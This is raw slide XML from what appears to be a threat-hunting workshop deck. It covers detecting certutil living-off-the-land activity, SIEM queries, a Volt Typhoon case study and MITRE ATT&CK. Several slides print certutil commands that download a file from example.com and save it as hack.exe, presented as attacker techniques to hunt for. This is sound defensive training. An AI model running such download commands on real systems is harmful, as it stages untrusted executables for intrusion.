              <a:rPr lang="en-AU" sz="2000" dirty="0"/>
              <a:t>\Content\[hash of file]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0"/>
              <a:t>We need to hunt for all three of these possibilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0"/>
              <a:t>There is no need to try and achieve this all in one query if it is difficult – splitting things into multiple queries is fine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3926252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858AF-30EF-D7C1-ADB0-6E91C83E7F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F27F59-9573-C780-D66C-BEA5B20843CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Analysis after researching the command</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF600470-A84B-BAD3-0057-BC399F316563}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="521704" y="1690687"/>
            <a:ext cx="11148592" cy="5054607"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>certutil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>urlcache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> –f https://example.com/file.123 hack.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>The –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>urlcache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> and –f options are required</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>certutil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>verifyctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> –f https://example.com/file.123 hack.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>The –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>verifyctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> and –f options are required</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>certutil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> –URL https://example.com/file.123 hack.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>-URL is required, but no –f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>The likely objective is to download an executable tool. However, the extension could be named to an executable after the download, or it could even just be a PowerShell or batch (.bat) script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Therefore, .exe is not necessarily an invariant – which is a shame because using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>certutil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> with .exe files is highly unique to malicious activity (it’s normally used with certificate files)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3215934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9E9E280-6DF7-878B-BA10-0E0574228B8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C23BFD-1512-F067-1C1A-DA200732BCAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371599" y="294538"/>
            <a:ext cx="9895951" cy="1033669"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Final invariant analysis</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{555917BC-4C53-A2D9-72DE-90AFF519F3A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371599" y="2318197"/>
            <a:ext cx="9724031" cy="3683358"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1900">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>certutil –urlcache –f https://example.com/file.123 hack.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="1900"/>
              <a:t>Certuril, -urlcache, -f,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1900">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>certutil –verifyctl –f https://example.com/file.123 hack.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="1900"/>
              <a:t>Certutil, -verifyctl, -f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1900">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>certutil –URL https://example.com/file.123 hack.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="1900"/>
              <a:t>Certutil, -url</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="1900"/>
              <a:t>If this isn’t enough, we can analyse the false positives we’re still seeing to see if we can identify any patterns and systematically eliminate the benign noise.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="1900"/>
              <a:t>If that isn’t successful, we can start to add additional requirements, starting with what introduces the least risk of missing something. But hopefully, the number of results is at least manageable.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="721598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9A2D41E-C080-380F-3F66-1B3A625C906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Animated Wall Clock">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9365B15-13B0-69BF-C796-41EF1BB48FF7}"/>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a:fill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1F4655-C9C4-88C9-54DC-21F2F400C564}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="321733" y="554845"/>
            <a:ext cx="10656891" cy="3902673"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-AU" sz="5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Workshop time!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 1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45E8B72F-F177-F30A-D10F-2C061B4597FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="315523" y="4718033"/>
            <a:ext cx="10678296" cy="1175039"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-AU">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Go hunt for the certutil living-off-the-land activity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="596930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FA59A3-6282-3C6E-42CC-669367A710B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CAD989-10F9-C678-B8B8-906ECB74D1A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371599" y="294538"/>
            <a:ext cx="9895951" cy="1033669"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Review</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A65DEFAD-C579-AE57-08E8-D4BDBC5379B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371599" y="2318197"/>
            <a:ext cx="9724031" cy="3683358"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2200" dirty="0"/>
              <a:t>If we’re getting too many results, we can add additional requirements that are less invariant</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="2200" dirty="0"/>
              <a:t>However, this introduces risk of missing activity, so this is our last option</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2200" dirty="0"/>
              <a:t>Preferably, we eliminate false positives by writing a smarter query:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="2200" dirty="0"/>
              <a:t>If just requiring the text strings themselves isn’t enough, we can use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2200" b="1" dirty="0"/>
              <a:t>matches regex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2200" dirty="0"/>
              <a:t> operator to create very specific requirements using regex. Regex isn’t too hard, just different – use regex101.com to build and test it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="2200" dirty="0"/>
              <a:t>If everything we can do with the data from one event isn’t enough, we may need to bring in data from other events to give us more context to work with, using a table join or union. This is more common as things get harder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2200" dirty="0"/>
              <a:t>Be sure to consider </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2200" u="sng" dirty="0"/>
              <a:t>all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2200" dirty="0"/>
              <a:t> the information in a report – not just what it says is good for hunting!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2147225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AD6A6-C986-F81A-D205-B1C60BBF67D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35DD21E-F2CC-CF35-9DE0-925619529AF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1227909" y="3602038"/>
            <a:ext cx="9204959" cy="1655762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2800" dirty="0"/>
              <a:t>How cyber threat intelligence tracks and thinks about activity: Volt Typhoon case study</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{915C5662-80B2-F4F3-CA00-A83F4DAE797B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1831341" y="2247901"/>
            <a:ext cx="7979804" cy="1078692"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3899289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E1FD8C1-E6D2-E498-C59E-2E7B711B0A6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CB3E15F-2D57-7375-41D3-719C35304E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F2836D-8C7D-788E-E013-6C2334A92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5E512B-696C-7141-7F92-4DE70F341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CD0658-36BB-BA9E-B9DE-A5238C504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C66EDE1-543B-6D27-6782-0425CAE41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656B4B-F28F-5D35-4277-580891D3DC1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371599" y="294538"/>
            <a:ext cx="9895951" cy="1033669"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Threat hunting may be done by:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7CC55FC-750A-E325-CE52-4476CDC71F0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371599" y="2200266"/>
            <a:ext cx="9985830" cy="3683358"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" b="1" dirty="0"/>
              <a:t>Collecting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0"/>
              <a:t> forensic artefacts from one or multiple devices</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>An “at the time” capture of the state of the device’s memory or disk – usually only limited areas of interest are captured if there’s many devices</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>E.g. On-device logs, Windows registry, running processes and network connections; or entire disk and memory if possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" b="1" dirty="0"/>
              <a:t>Examining</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0"/>
              <a:t> centralised log data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Logs forwarded from devices to a central storage system (usually cloud storage), where they are kept for 30 days – 2+ years</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>E.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" u="sng" dirty="0"/>
              <a:t>Microsoft Sentinel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>, CrowdStrike NG-SIEM, Splunk, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>Wazuh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>, Elastic</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84626B5A-BF92-943C-B80F-8A8B37F4413B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2079171" y="5883624"/>
            <a:ext cx="6096000" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" u="sng" dirty="0"/>
              <a:t>This is us!</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 2" descr="Microsoft Sentinel | SIEM enriched by AI, automation, and threat  intelligence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F8D9DE7-1F5B-5864-5AF9-0D80361D8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9914" y="5893077"/>
            <a:ext cx="790667" cy="923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3338C4D-259F-173F-5CB0-DAD8E6E65749}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5068110" y="6396260"/>
            <a:ext cx="1885124" cy="403108"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 4" descr="CrowdStrike Falcon Next-Gen SIEM | Vectra">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A3F2689-5BD2-EC38-EE2D-4C39865F96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3286" y="6020570"/>
            <a:ext cx="2363599" cy="49026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Splunk Transforms for Maltego">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDB2E494-3AE9-BFA3-7149-BD1823F88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3145" y="5963874"/>
            <a:ext cx="1193662" cy="75695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Wazuh Indexer and Dashboard Performance Optimization - TeknoKafe">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14C87BD8-7263-604B-884C-7F86805C7AF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765" t="32827" r="6033" b="32468"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9436545" y="6226485"/>
            <a:ext cx="1193662" cy="26384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Elastic to Announce Fourth Quarter and Fiscal 2025 Earnings Results on  Thursday, May 29, 2025">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09495B5F-44E5-9F7D-CE61-28819EC42D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79752" y="5786804"/>
            <a:ext cx="885249" cy="1038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2567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CFEC6-895E-D4C2-4E40-594A98F760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0D2E38-FBBB-C6A4-D40D-142B21BF40E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>How Volt Typhoon Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A60F63D4-B4CD-89C9-429F-98DA51FD4A8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1770505" y="1690527"/>
            <a:ext cx="8650990" cy="4802348"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="804616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2C17F-6B40-41D1-06EA-8C94E0F265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2AAF51-92C8-E2BD-5FEB-D2A71CFD9800}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="0"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>The MITRE ATT&amp;CK matrix (enterprise)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
